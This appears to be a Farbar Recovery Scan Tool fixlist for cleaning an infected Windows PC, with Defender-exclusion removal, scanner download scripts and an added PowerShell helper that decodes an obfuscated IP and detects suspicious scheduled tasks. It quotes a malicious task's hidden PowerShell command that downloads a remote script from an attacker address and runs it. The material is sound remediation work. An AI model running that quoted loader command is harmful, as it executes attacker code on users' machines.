Start::
CreateRestorePoint:
CloseProcesses:
2026-04-25 22:58 - 2026-04-25 22:58 - 000000000 ____D C:\Users\Joel Castro\AppData\Roaming\RenPy
HKLM\...\Run: [] => [X]
HKU\S-1-5-21-3237484940-2862176218-2778486117-1001\...\Run: [AMDNoiseSuppression] => "C:\WINDOWS\system32\AMD\ANR\AMDNoiseSuppression.exe" (No File)
S3 cpuz149; no ImagePath
S3 cpuz158; no ImagePath
S1 eoiuuags; no ImagePath
S1 pidgferk; no ImagePath
ShellIconOverlayIdentifiers: [ tdpico] -> {c88d4dbb-d890-40b6-bcc7-bca43c1eb5ee} => C:\Program Files (x86)\IObit\Advanced SystemCare\ASCSafeFolderShlExt.dll -> No File
AlternateDataStreams: C:\ProgramData\DP45977C.lfl:677104FCAA [5170]
AlternateDataStreams: C:\ProgramData\system.conf:0F57F3FDE6 [5170]
AlternateDataStreams: C:\ProgramData\system.conf:2EEF3BCE16 [5170]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini:B1DA6C571C [5170]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\RCDate.ini:1C726B22CB [5170]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\RCDate.ini:1C78495C48 [5170]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Immersive Control Panel.lnk:DC8F23BC3A [5170]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RCDate.ini:D929617DE9 [5170]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RCDate.ini:E09BDC68EB [5170]
AlternateDataStreams: C:\Users\Public\Documents\system.conf:430CBAC4A2 [4306]
AlternateDataStreams: C:\Users\Public\Documents\system.conf:9637CBAABE [5170]
FirewallRules: [{C15301B6-D166-4691-8EEC-55B3CB2955AF}] => (Block) %ProgramFiles%\Adobe\Adobe Illustrator 2022\Support Files\Contents\Windows\Illustrator.exe => No File
FirewallRules: [{97496F92-2474-4531-AF8B-AAF2F35194FD}] => (Block) %ProgramFiles%\Adobe\Adobe Illustrator 2022\Support Files\Contents\Windows\Illustrator.exe => No File
FirewallRules: [TCP Query User{EE1F0E0D-5D8F-4798-8795-98D473D36F0F}D:\programas\resolve.exe] => (Allow) D:\programas\resolve.exe => No File
FirewallRules: [UDP Query User{1026D6E6-DE59-4531-A3A5-3997ABAE9CE0}D:\programas\resolve.exe] => (Allow) D:\programas\resolve.exe => No File
FirewallRules: [TCP Query User{603BFEAF-7F4C-46EA-A617-01E84C65774E}D:\programas\fuscript.exe] => (Allow) D:\programas\fuscript.exe => No File
FirewallRules: [UDP Query User{1F01084C-3675-45B8-B10E-EC27BDAEC037}D:\programas\fuscript.exe] => (Allow) D:\programas\fuscript.exe => No File
FirewallRules: [{002AC5E0-25A7-4BBD-B8F2-685980F1F457}] => (Allow) D:\Programas\Blackmagic Design\ElementsPanelDaemon.exe => No File
FirewallRules: [TCP Query User{DBA578E8-2927-4965-912B-ECBC4CD32DD4}C:\users\joel castro\appdata\local\capcut\apps\8.2.0.3462\capcut.exe] => (Allow) C:\users\joel castro\appdata\local\capcut\apps\8.2.0.3462\capcut.exe => No File
FirewallRules: [UDP Query User{C75A3F23-B0C2-4095-82DE-D31A6A369A22}C:\users\joel castro\appdata\local\capcut\apps\8.2.0.3462\capcut.exe] => (Allow) C:\users\joel castro\appdata\local\capcut\apps\8.2.0.3462\capcut.exe => No File
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiSpyware] Restriction <==== ATTENTION
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiVirus] Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
HKU\S-1-5-21-3237484940-2862176218-2778486117-1001\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {00c7cd58-2ad2-42e6-b2e4-885b1c07cc83} - no filepath. <==== ATTENTION
Task: {0a92fa98-799b-4823-8900-ceefda4cd81a} - no filepath. <==== ATTENTION
Task: {0cf28a1d-3081-4914-96d6-5f24ef7673a4} - no filepath. <==== ATTENTION
Task: {105D676A-D551-4274-81E7-97AC52E4FD87} - \Microsoft\Windows\Speech\HeadsetButtonPress -> No File <==== ATTENTION
Task: {1949073A-8FDA-4EA4-8E59-407CDB02440F} - \Microsoft\Windows\WindowsUpdate\sihpostreboot -> No File <==== ATTENTION
Task: {1d97447e-06ec-4b82-b251-30d57cf17038} - no filepath. <==== ATTENTION
Task: {1f49f36a-f987-4a19-8418-f5b445327584} - no filepath. <==== ATTENTION
Task: {23424976-e681-4465-abb9-07127dc58deb} - no filepath. <==== ATTENTION
Task: {287fcaa2-ee71-4cea-bce2-828caccf5e6b} - no filepath. <==== ATTENTION
Task: {29e9cbd2-e61d-4af9-934b-7e790a8b0000} - no filepath. <==== ATTENTION
Task: {2e4891de-d627-4a78-bcb6-f1829e121645} - no filepath. <==== ATTENTION
Task: {33b78077-fe72-471e-b579-80cb1d49d51c} - no filepath. <==== ATTENTION
Task: {352cf6c3-7f7d-4d68-90e1-05b099218bd2} - no filepath. <==== ATTENTION
Task: {3a98853b-7680-421b-9805-31fb1f915e69} - no filepath. <==== ATTENTION
Task: {4f169d9e-1132-4bba-a0b6-17d34f9e80d8} - no filepath. <==== ATTENTION
Task: {58b16592-0d5c-4321-ac33-ce35479e9a38} - no filepath. <==== ATTENTION
Task: {5a2083e9-fc5b-4f81-94f6-b2bcc6dcd544} - no filepath. <==== ATTENTION
Task: {5c211a57-a5b5-4e8d-b881-65325d7cc4b2} - no filepath. <==== ATTENTION
Task: {5cf63dd2-3081-459e-bd2c-703acc3c4ad3} - no filepath. <==== ATTENTION
Task: {60cd33df-6f98-44ec-b074-a2e1ec2e5ada} - no filepath. <==== ATTENTION
Task: {65e056c1-cdfd-4c4d-bd8b-21d6530ee079} - no filepath. <==== ATTENTION
Task: {66f69c7c-4224-43d2-97c6-726b38634934} - no filepath. <==== ATTENTION
Task: {7b2cd366-c3fe-415f-87e1-b730cf8d9dea} - no filepath. <==== ATTENTION
Task: {820d1fb3-d061-4e08-a8fb-c065717949c8} - no filepath. <==== ATTENTION
Task: {8a26adfa-bf15-4171-9803-1e26150bfa65} - no filepath. <==== ATTENTION
Task: {8ef1c1bb-2708-4c92-8aa1-3e0cdf5601a8} - no filepath. <==== ATTENTION
Task: {94903151-4551-4d2c-8876-eb0c0c913cc1} - no filepath. <==== ATTENTION
Task: {968a52c9-06ed-405d-bda5-cb419f2044bf} - no filepath. <==== ATTENTION
Task: {98d0cd9a-72c6-4c72-b70c-8552fadfcff9} - no filepath. <==== ATTENTION
Task: {9e3171a9-77ba-441b-9847-036935e79c79} - no filepath. <==== ATTENTION
Task: {a6f0042d-e958-4ad2-b74a-805f92ad5f04} - no filepath. <==== ATTENTION
Task: {a8d55453-5771-4764-9bc7-8aee15e8d335} - no filepath. <==== ATTENTION
Task: {ad0ad611-9a3d-4e5d-b0f8-0747caecd46a} - no filepath. <==== ATTENTION
Task: {b2e6706f-1275-4c15-9581-2f2e120b2b5d} - no filepath. <==== ATTENTION
Task: {b348cdd0-0fca-4748-ae19-7cc4f08a028d} - no filepath. <==== ATTENTION
Task: {bc2fc9fd-f390-4b7e-8731-1fd84b8cbdf3} - no filepath. <==== ATTENTION
Task: {c5d32a7c-4dac-467b-a310-e0d6da121342} - no filepath. <==== ATTENTION
Task: {cd3ff483-003d-4c21-833d-a85c4548881d} - no filepath. <==== ATTENTION
Task: {d2ad787b-4d66-48bd-a03c-62c86cd6edd6} - no filepath. <==== ATTENTION
Task: {d56cb12d-d536-4bfe-a0b0-e8198ba9cf52} - no filepath. <==== ATTENTION
Task: {dc310f67-4493-4ecf-b1e9-394d3cf57170} - no filepath. <==== ATTENTION
Task: {df4f9cfc-e79a-4429-8241-0545cd695c88} - no filepath. <==== ATTENTION
Task: {e91c97c9-466d-4015-aed9-cc048648a03e} - no filepath. <==== ATTENTION
Task: {ea185359-26bd-4de9-9533-118edc559f6e} - no filepath. <==== ATTENTION
Task: {ec67af91-4501-4a01-9c7d-e683a859a1b1} - no filepath. <==== ATTENTION
Task: {f7bd8264-7dee-4f3e-a544-42ab49229b68} - no filepath. <==== ATTENTION
Task: {fd5b4221-434a-4d52-a49a-2a31e1720d13} - no filepath. <==== ATTENTION
Task: {ff13cd21-4adc-45d4-95e0-ba00c5032413} - no filepath. <==== ATTENTION
Task: {9909A39A-F99E-45F4-856D-D072F6C18E3B} - System32\Tasks\Google Compatibility Appraiser CL_NCL_1bb985112a9376f8 => C:\WINDOWS\system32\conhost.exe [867840 2024-12-11] (Microsoft Windows -> Microsoft Corporation) -> --headless C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -ExecutionPolicy Bypass -WindowStyle Hidden -Command "if(!(Get-Process CheckNetIsolation,CloudExperienceHostBroker -EA 0)){Invoke-RestMethod 79.8141710/cl-ncl-following | Invoke-Expression}else{exit 1}" <==== ATTENTION
S3 cpuz154; C:\WINDOWS\temp\cpuz154\cpuz154_x64.sys [40976 2026-04-26] (Microsoft Windows Hardware Compatibility Publisher -> CPUID) <==== ATTENTION
FCheck: C:\WINDOWS\SysWOW64\version_IObitDel.dll [2024-11-15] <==== ATTENTION (zero byte File/Folder)
HKU\S-1-5-21-3237484940-2862176218-2778486117-1001\...\Policies\Explorer: [DisallowRun] 0
2026-04-25 22:59 - 2026-04-25 22:59 - 000004434 _____ C:\WINDOWS\system32\Tasks\Google Compatibility Appraiser CL_NCL_1bb985112a9376f8
StartPowershell:
# Remove every Windows Defender exclusion (paths, extensions, processes) so that
# nothing the malware whitelisted stays hidden from subsequent scans.
Try {
    $Paths      = (Get-MpPreference).ExclusionPath
    $Extensions = (Get-MpPreference).ExclusionExtension
    $Processes  = (Get-MpPreference).ExclusionProcess
    foreach ($Path in $Paths) {
        Remove-MpPreference -ExclusionPath $Path -Force -ErrorAction Stop
    }
    foreach ($Extension in $Extensions) {
        Remove-MpPreference -ExclusionExtension $Extension -Force -ErrorAction Stop
    }
    foreach ($Process in $Processes) {
        Remove-MpPreference -ExclusionProcess $Process -Force -ErrorAction Stop
    }
} Catch {
    Write-Error "Error occurred while removing Windows Defender exclusions: $_"
}
EndPowershell:
StartPowerShell:
# This snippet downloads Emsisoft Emergency Kit (EEK) from Emsisoft's official site, updates it, and scans with it.
# Do note that the executable is 300MB and may take some time to download.
# ---
# This will scan for malware and PUPs in 1) system memory and 2) important folders, as the documentation says.
# It will scan inside compressed archives, mail archives and NTFS alternate data streams, and use cloud requests.
# ---
# You can use the argument "/delete" to delete found objects including references, but this is permanent and irreversible.
# You can remove the "/quick" argument to do a full scan, but that may take longer than what FRST can handle.
# You can use the argument "/quarantine="[folder]"" to put found malware into quarantine, but I personally prefer first verifying the detections.
$downloadUrl = "https://dl.emsisoft.com/EmsisoftEmergencyKit.exe"
$systemDrive = $env:SystemDrive
$frstPath    = "$systemDrive\FRST"
$savePath    = "$frstPath\EEK.exe"
$extractPath = "$frstPath\EEK"
if (-not (Test-Path $frstPath))    { New-Item -Path $frstPath    -ItemType Directory -Force | Out-Null }
if (-not (Test-Path $extractPath)) { New-Item -Path $extractPath -ItemType Directory -Force | Out-Null }
Invoke-WebRequest -Uri $downloadUrl -OutFile $savePath -UseBasicParsing
# Silent self-extract into $extractPath; wait until the 64-bit scanner exists, then stop the extractor.
$proc = Start-Process -FilePath $savePath -ArgumentList "-s -d`"$extractPath`"" -PassThru
while (-not (Test-Path "$extractPath\bin64\a2cmd.exe")) {
    Start-Sleep -Milliseconds 1000
}
Stop-Process -Id $proc.Id -Force -ErrorAction SilentlyContinue
if ([Environment]::Is64BitOperatingSystem) {
    $a2cmdPath = Join-Path $extractPath "bin64\a2cmd.exe"
} else {
    $a2cmdPath = Join-Path $extractPath "bin32\a2cmd.exe"
}
Start-Process -FilePath $a2cmdPath -ArgumentList "/update" -Wait -NoNewWindow
Start-Process -FilePath $a2cmdPath -ArgumentList "/malware /quick /m /t /pup /a /am /cloud=1 /la=`"$frstPath\EEK_scan.log`"" -Wait -NoNewWindow
Get-Content "$frstPath\EEK_scan.log"
exit
EndPowerShell:
StartPowerShell:
# Downloads the newest AdwCleaner version directly from Malwarebytes, performs an update, scans, cleans and writes the log to the console.
# Does not clean preinstalled objects, only PUP/Adware.
# If you would like to delete preinstalled objects, add the argument /preinstalled to the /clean argument.
# If you would like to only scan with it, change the argument from /clean to /scan.
New-Item -ItemType Directory -Force -Path "$env:SystemDrive\AdwCleaner" | Out-Null
Invoke-WebRequest -Uri "https://adwcleaner.malwarebytes.com/adwcleaner?channel=release" -OutFile "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe"
Start-Process -FilePath "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" -ArgumentList "/eula" -Wait -WindowStyle Hidden
$logFile = "$env:SystemDrive\AdwCleaner\AdwCleanerOutputFRST.txt"
Start-Process -FilePath "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" -ArgumentList "/noreboot /clean" -Wait -WindowStyle Hidden -RedirectStandardOutput $logFile
Get-Content $logFile -Encoding Unicode
Remove-Item -Path $logFile -Force -ErrorAction SilentlyContinue
EndPowerShell:
CMD: netsh int ip reset
CMD: netsh int ipv6 reset
CMD: ipconfig /flushDNS
CMD: netsh winsock reset catalog
C:\Users\CurrentUserName\AppData\Local\Temp\*
C:\Windows\Temp\*
EmptyTemp:
End::
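The flagged "Google Compatibility Appraiser" task above launches PowerShell to fetch and Invoke-Expression a script from 79.8141710/cl-ncl-following, a host written in inet_aton shorthand rather than dotted-quad form so that it does not look like an IP address. The PowerShell below is an added example, not part of the fixlist and not FRST's own code: it decodes that shorthand (8141710 is 0x7C3B8E, so the literal is 79.124.59.142 under inet_aton rules, assuming the URL parser honours that shorthand as .NET's Uri class does) and then lists scheduled tasks whose actions carry the same download-and-run traits, so a re-created copy under another name is caught. The function names, the regex of traits and the output fields are my choices and are not anything FRST reports.

```powershell
# Added example, not part of the fixlist above.
# 1) ConvertFrom-ShortIPv4 decodes inet_aton-style IPv4 shorthand such as the
#    "79.8141710" host the flagged task passes to Invoke-RestMethod.
# 2) Find-SuspiciousTaskAction lists scheduled tasks whose action launches
#    PowerShell with the same download-and-run / hidden / bypass traits.

function ConvertFrom-ShortIPv4 {
    [CmdletBinding()]
    param([Parameter(Mandatory)][string]$Literal)

    $parts = $Literal.Split('.')
    if ($parts.Count -gt 4) { throw "Not an IPv4 literal: $Literal" }

    # Each component may be hex (0x..), octal (leading 0) or decimal, as inet_aton allows.
    $values = @(foreach ($p in $parts) {
        if     ($p -match '^0[xX][0-9a-fA-F]+$') { [Convert]::ToUInt64($p.Substring(2), 16) }
        elseif ($p -match '^0[0-7]+$')           { [Convert]::ToUInt64($p.Substring(1), 8) }
        elseif ($p -match '^(0|[1-9][0-9]*)$')   { [uint64]$p }
        else   { throw "Bad component '$p' in $Literal" }
    })

    # All components but the last are single octets; the last one fills the
    # remaining octets, so "79.8141710" is 79 followed by a 24-bit value.
    $octets = New-Object uint64[] 4
    for ($i = 0; $i -lt $values.Count - 1; $i++) {
        if ($values[$i] -gt 255) { throw "Component $($values[$i]) exceeds 255 in $Literal" }
        $octets[$i] = $values[$i]
    }
    $last      = [uint64]$values[-1]
    $lastWidth = 4 - ($values.Count - 1)
    if ($last -ge [math]::Pow(256, $lastWidth)) { throw "Last component out of range in $Literal" }
    for ($j = 3; $j -ge $values.Count - 1; $j--) {
        $octets[$j] = $last % 256
        $last = [uint64][math]::Floor($last / 256)
    }
    return ($octets -join '.')
}

function Find-SuspiciousTaskAction {
    # Traits taken from the flagged task's command line (hypothetical list; extend as needed).
    # -ExecutionPolicy Bypass and -WindowStyle Hidden also appear in legitimate admin tasks,
    # so review the Command column rather than deleting on sight.
    $pattern = 'Invoke-RestMethod|Invoke-WebRequest|\b(irm|iwr|iex)\b|Invoke-Expression|' +
               '-EncodedCommand|-ExecutionPolicy\s+Bypass|-WindowStyle\s+Hidden|conhost\.exe.*--headless'
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            $cmd = ("{0} {1}" -f $action.Execute, $action.Arguments).Trim()
            if ($cmd -match $pattern) {
                [pscustomobject]@{
                    TaskPath = $task.TaskPath
                    TaskName = $task.TaskName
                    Author   = $task.Author
                    State    = $task.State
                    Command  = $cmd
                }
            }
        }
    }
}

# Usage (run from an elevated PowerShell so Get-ScheduledTask sees every task)
ConvertFrom-ShortIPv4 '79.8141710'
Find-SuspiciousTaskAction | Sort-Object TaskPath, TaskName | Format-List
```

The decoded address is what to block at the firewall and search for in proxy or DNS logs; the shorthand form will not match a plain IP search. Note also the task's guard clause: it only downloads when CheckNetIsolation and CloudExperienceHostBroker are not running, a cheap sandbox check, so the second-stage URL may return nothing when fetched from an analysis VM that has those processes alive.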